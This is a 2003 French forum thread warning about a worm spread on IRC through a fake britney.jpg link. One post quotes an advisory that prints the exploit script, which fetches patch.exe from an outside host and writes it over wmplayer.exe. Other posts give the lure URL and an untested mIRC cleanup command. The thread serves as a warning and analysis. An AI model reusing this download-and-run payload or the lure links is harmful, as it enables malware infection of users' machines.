Communauté Informatique NDFR.net : Ne jouez pas avec Britney - Actualité
Répondre
Ne jouez pas avec Britney
Outils du sujet Modes d'affichage
  #1  
Ancien 27 October 2003, 12h01
Avatar de Cougar
Cougar Cougar est hors ligne
Membre senior
 
Date d'inscription: 16/09/2001
Lieu: Orléans
Âge: 34
Messages: 3 850
Envoyer un message par MSN à Cougar
Ne jouez pas avec Britney

Lien direct de la news : Ne jouez pas avec Britney
Depuis hier, un nouveau virus se propage sur le Net via le réseau IRC en exploitant les failles d'Internet Explorer et de Windows Media Player.

Derrière le lien attirant du type http://www..../britney.jpg se dissimule un ver très puissant qui aura vite fait de s'introduire dans votre ordinateur.

Très rapidement, le virus s'attaque à votre base de registre, empêchant l'exécution des programmes, et modifie le script.ini de votre client IRC pour diffuser le lien sur vos chans de discussions (http://www.angelfire.com/celeb2/---/britney.jpg <- uuh, check it out !! ).

Pour l'instant, aucun antivirus ne semble être en mesure de détecter le virus, en effet, votre serviteur Formatman, qui a testé pour vous ce virus, a vu son Norton 2004 s'étaler misérablement en une dizaine de minutes (AVP et McAfee sont aussi impuissants).

La seule solution existante pour le moment est de réinstaller Windows après avoir formaté le disque dur système.

Pour des informations plus techniques, rendez-vous ici.
__________________
Réponse avec citation
  #2  
Ancien 27 October 2003, 13h20
Avatar de dredgerman69
dredgerman69 dredgerman69 est hors ligne
Membre senior
 
Date d'inscription: 20/10/2002
Lieu: Lyon
Âge: 31
Messages: 304
Envoyer un message par MSN à dredgerman69
Re: Ne jouez pas avec Britney

Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
Réponse avec citation
  #3  
Ancien 27 October 2003, 13h33
Avatar de 1for-matik
1for-matik 1for-matik est hors ligne
W32.Boulet.Worm Eraser
 
Date d'inscription: 05/10/2003
Lieu: Au Pays de la choucroute
Âge: 35
Messages: 3 839
Envoyer un message par ICQ à 1for-matik Envoyer un message par AIM à 1for-matik Envoyer un message par Yahoo à 1for-matik Envoyer un message via Skype™ à 1for-matik
Re: Ne jouez pas avec Britney

Citation:
Originellement posté par dredgerman69
Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
G peur :confused: !
Norton n'a même pas encor publié son patch :confused:
__________________
Des problèmes ? Le chat NDFR est disponible. Des problèmes pour y accéder ? Voici le tuto.
Le Best Of "QUOTES" du chan IRC: C'est par ici


Sur n'1fo[r-matik]
: Astuce : Activer le bloqueur de pub/tracking natif sur Firefox


Dernière édition par 1for-matik ; 27 April 2016 à 16h17.
Réponse avec citation
  #4  
Ancien 27 October 2003, 13h34
Avatar de rog62
rog62 rog62 est hors ligne
Membre senior
 
Date d'inscription: 16/11/2002
Lieu: Capitale du Condroz
Âge: 56
Messages: 2 349
Envoyer un message par MSN à rog62
Re: Ne jouez pas avec Britney

Citation:
Originellement posté par dredgerman69
Attention le Lien vers le fichier texte pour plus d'information contient un cheval de trois appellé vbs/pysme mon anti virus ( virus scan 8 ) me la detecté et sorti sa fiche technique que vous pouvez voir ici
Donc, si j'ai bien compris... il faut même se méfier de Minou...
__________________
Cordialement Rog62

"Comprenne qui pourra..."
Réponse avec citation
  #5  
Ancien 27 October 2003, 13h40
Avatar de Cougar
Cougar Cougar est hors ligne
Membre senior
 
Date d'inscription: 16/09/2001
Lieu: Orléans
Âge: 34
Messages: 3 850
Envoyer un message par MSN à Cougar
Re: Ne jouez pas avec Britney

ben le lien http://charmy.tky.hut.fi/brit.txt ne contient aucun virus/ver/...

Aussi bien benjy, formatman et moi n'avons eu aucun problèmes en allant sur ce lien.

voilà ce qu'il contient :
Citation:
2003-10-26 15:15 (+0200)DO NOT CLICK ON britney.jpg!!!Under no circumstances open an URL that ends with britney.jpg. It is actuallyan Internet Explorer / Windows Media Player exploit, as shown below.-----var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";-----patch.exe seems to be compressed with UPX, interesting strings can be found within.0005 18E0 2F 2E 61 6D 73 67 20 68 74 74 70 3A 2F 2F 77 77 /.amsg http://ww0005 18F0 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 6F 6D 2F w.angelfire.com/0005 1900 63 65 6C 65 62 32 2F 70 69 63 73 78 2F 62 72 69 celeb2/picsx/bri0005 1910 74 6E 65 79 2E 6A 70 67 20 3C 2D 20 75 75 68 2C tney.jpg <- uuh,0005 1920 20 63 68 65 63 6B 20 69 74 20 6F 75 74 20 21 21 check it out !!This is a command it sends automatically to mIRC. This causes mIRC to send theexploit URL to all channels you are in.It will replace/delete Windows system files. If that happens, you might get amessage of this sort: "Files that are required for Windows to run properly havebeen replaced by unrecognized versions".This is NOT the same thing as http://koti.phnet.fi/jonninen/mircwo...tny.txt.15:30: At this time I don't know if the worm can be removed. If it manages to deleteyour Windows system files, you'll have to reinstall Windows.15:40: Angelfire and scavenger.sharewith.us have been informed of the exploit theyare hosting.16:00: The first sighting of this was at about 14:29 in IRCnet, 14:34 (+0200) inEFnet.According to reports, simply "repairing" the Windows install or copying the deletedfiles back isn't enough, since the virus also messes around with the Windows registry.You'll have to reinstall Windows.16:30: According to reports, the URL was seen in Quakenet at 14:13. Figures. 16:40: According to reports, the URL was seen in IRCnet at 14:21 and at 14:32 in mIRC-X.17:00: There's a list of Windows system files in the uncompressed version of patch.exestarting at around offset 0x510c0, including (but not limited to) ntoskrnl.exe,userinit.exe, services.exe, etc. There are also references to some anti-virus andfirewall programs in the immediate vicinity. The virus probably disables theseprograms so that it can roam freely.Reports say that the virus does not affect Windows 98, but it definitely affectsat least Windows 2000 and XP. Anti-virus software does not help you at this point,since none of them recognize the virus yet.The scavenger.sharewith.us site has been disabled. This prevents the virus frominfecting machines for now, but the Angelfire page is still up and the author ofthe virus could modify the page to point to another location.The IE exploit: http://www.security.nnov.ru/search/d...cid=510217:30: The virus might not affect Windows Media Player version 8. (seehttp://www.kb.cert.org/vuls/id/222044)19:10: According to reports, the virus does affect WMP 8 as well. Better not openany suspicious links as long as you use IE.2003-10-26 19:10 (+0200), /msg Gridle in IRCnet or EFnet if you have more information.
__________________
Réponse avec citation
  #6  
Ancien 27 October 2003, 13h47
Avatar de Benjy
Benjy Benjy est hors ligne
Administrateur
 
Date d'inscription: 21/08/2001
Lieu: Rueil Malmaison (92)
Âge: 37
Messages: 2 043
Envoyer un message par MSN à Benjy
Re: Ne jouez pas avec Britney

C'est parce que ton antivirus s'affole à cause de l'extrait de code VB.
__________________
Merci de lire et de respecter les règles et d'utiliser la .
Réponse avec citation
  #7  
Ancien 27 October 2003, 15h41
Avatar de dredgerman69
dredgerman69 dredgerman69 est hors ligne
Membre senior
 
Date d'inscription: 20/10/2002
Lieu: Lyon
Âge: 31
Messages: 304
Envoyer un message par MSN à dredgerman69
Re: Ne jouez pas avec Britney

Ben Surment mais comme ça ça prouve que mon Pc est ultra securisé contre les virus et les cheveaux de troie
Réponse avec citation
  #8  
Ancien 27 October 2003, 16h36
Avatar de ThOMaZ2118
ThOMaZ2118 ThOMaZ2118 est hors ligne
Assassination Enthousiast
 
Date d'inscription: 27/05/2003
Lieu: HQ CIA, Langley, Viginia, United States
Âge: 34
Messages: 299
Envoyer un message par MSN à ThOMaZ2118
Re: Ne jouez pas avec Britney

si vous l'avez vous n'etes pas encore obligé deformatter...
Cette ligne de texte dans votre client IRC devrai aussi pouvoir le suprimer (je n'ai pas tester):
//unload -rs script.ini | write -c script.ini | remove script.ini | run command.com /c attrib.exe -r mirc.ini | ignore -r

et le programme ici aussi (non plus pas testé): http://dronehunt.jbdesign.net/clean/spydll-clean.exe

J'espere que ca poura aider qq1
Réponse avec citation
  #9  
Ancien 27 October 2003, 17h08
Avatar de Cougar
Cougar Cougar est hors ligne
Membre senior
 
Date d'inscription: 16/09/2001
Lieu: Orléans
Âge: 34
Messages: 3 850
Envoyer un message par MSN à Cougar
Re: Ne jouez pas avec Britney

ben j'ai plusieurs copains qui ont testé le spydll-clean.exe sans succès.

dredgerman69, si tu veux je t'envoie le link en pv pour tester ta sécurité
__________________
Réponse avec citation
  #10  
Ancien 28 October 2003, 02h54
traducman traducman est hors ligne
Membre
 
Date d'inscription: 21/10/2003
Messages: 75
Re: Ne jouez pas avec Britney

Citation:
http://www.symantec.com/avcenter/venc/data/irc.trojan.fgt.html
! mettez à jour NAV !
Citation:
http://securityresponse.symantec.com/avcenter/download/pages/FR-N95.html
Réponse avec citation
  #11  
Ancien 28 October 2003, 08h08
Avatar de Werner
Werner Werner est hors ligne
cOWboy attitUDe
 
Date d'inscription: 15/09/2001
Lieu: Stuttgart
Âge: 39
Messages: 2 961
Re: Ne jouez pas avec Britney

Ah c'est pas trop tôt mieux vos tard que jamais comme on dit

Enfin ils ont été mauvais sur ce coup car ils l'ont découvert que dimanche alors que ce virus traîne depuis vendredi (voir même avant).
Réponse avec citation
  #12  
Ancien 28 October 2003, 12h10
Avatar de LeMoi
LeMoi LeMoi est hors ligne
ou LM
 
Date d'inscription: 20/10/2002
Lieu: 37°1
Âge: 33
Messages: 5 847
Envoyer un message par ICQ à LeMoi Envoyer un message par AIM à LeMoi Envoyer un message par MSN à LeMoi Envoyer un message par Yahoo à LeMoi Envoyer un message via Skype™ à LeMoi
Re: Ne jouez pas avec Britney

bah au contraire, de dimanche à vendredi, c'est plutot pas mal...
sinon, comment qu'on le chope ce virus ? formatman l'a fait exprès ou bien l'a vraiment eu ? et a-t-il vraiment formatté lui aussi (D'après son pseudo, ça changerait pas trop de sa routine ?
__________________
[01mai2004@11:23:54] <@Kaspof> je garderais toujours un souvenir impérissable de toi LeMoi|Vacances
Ne soyez pas un boulet !
Réponse avec citation
  #13  
Ancien 28 October 2003, 13h40
Avatar de Fred
Fred Fred est hors ligne
00 Agent
 
Date d'inscription: 19/10/2002
Lieu: MI6 HQ
Âge: 34
Messages: 2 452
Envoyer un message par MSN à Fred
Re: Ne jouez pas avec Britney

Ils disent qu'il exploite une faille IE/MediaPlayer : est-ce que ca signifie que nous sommes protégé avec les dernières maj IE ou Microsoft va-t-il sortir un nouveau patch ?

Ca me fait penser qu'une nouvelle MAJ DVD MediaPlayer vient de sortir -> direction WU
__________________
Eh y'a une grenouill' sur le bureau !!!
... non Gaston y'a pas d'grenouille sur le bureau
Eh y'a un gorille devant la porte !!!
... non Gaston y'a pas de gorille devant la porte
Weua y'a un p'tit oiseau sur la table !!!
... non Gaston

Dernière édition par Fred ; 28 October 2003 à 13h57.
Réponse avec citation
  #14  
Ancien 28 October 2003, 14h26
Avatar de Werner
Werner Werner est hors ligne
cOWboy attitUDe
 
Date d'inscription: 15/09/2001
Lieu: Stuttgart
Âge: 39
Messages: 2 961
Re: Ne jouez pas avec Britney

Oui j'ai fais exprès de me le chopper j'avais mon DVDR avec l'image du système qui était prêt et comme je voulais tout rebalancer ça tombait bien.

Donc le Cougar me donne le lien, avant je regarde Windows Update et les maj de Norton et rien. Donc en gros j'étais parfaitement à jour et tout le système est parti en miette en quelques minutes ça prouve une nouvelle fois que les antivirus ne servent à rien car aujourd'hui vous avez peut-être la mise à jour pour ce virus mais demain vous ne l'aurez peut-être pas à temps.

Je me suis passé pdt de longue année d'antivirus car c'est cher et ça consomme des ressources inutilement (même au boulot on en avait un à une époque et maintenant plus aucun ). Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.
Réponse avec citation
  #15  
Ancien 28 October 2003, 16h30
Avatar de LeMoi
LeMoi LeMoi est hors ligne
ou LM
 
Date d'inscription: 20/10/2002
Lieu: 37°1
Âge: 33
Messages: 5 847
Envoyer un message par ICQ à LeMoi Envoyer un message par AIM à LeMoi Envoyer un message par MSN à LeMoi Envoyer un message par Yahoo à LeMoi Envoyer un message via Skype™ à LeMoi
Re: Ne jouez pas avec Britney

Citation:
Originellement posté par Formatman
Le meilleur antivirus c'est de ne pas cliquer n'importe où et de faire attention aux mails.
Exactement, c'est le meilleur moyen c'est pour ça que j'en ai pas, ni mm de firewall
__________________
[01mai2004@11:23:54] <@Kaspof> je garderais toujours un souvenir impérissable de toi LeMoi|Vacances
Ne soyez pas un boulet !
Réponse avec citation
Répondre

Signets


Utilisateurs actuellement actifs visualisant ce sujet : 1 (0 membres et 1 invités)
 
Outils du sujet
Modes d'affichage

Règles des messages
Vous ne pouvez pas poster de nouveaux sujets
Vous pouvez poster des réponses
Vous ne pouvez pas envoyer de pièces jointes
Vous ne pouvez pas éditer vos messages

Le code BB est oui
Les Smilies sont activés : oui
Le code [IMG] est activé : oui
Le code HTML est activé : non

Aller au forum

Sujets similaires
Sujet Auteur Forum Réponses Dernier message
Cours de français Benjy Discussions sur le site et/ou le forum 47 1 May 2006 14h47
Test du routeur (WGT624v2) et de la carte PCMCIA (WG511T) Wifi Netgear Fred Articles 42 31 August 2004 16h44
Comparatif des gestionnaires de téléchargement Kaspof Articles 106 27 February 2004 15h03
Premiers pas sous Linux Fred Articles 19 21 October 2003 05h46
Probleme de Raid avec MSI K7T266 Pro2 RU Lionel-78 Windows NT4/2000/XP Client 0 3 April 2003 12h01

Toutes les heures sont au format GMT +2. Il est actuellement 19h13.

Activé par vBulletin® Version 3.8.4
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.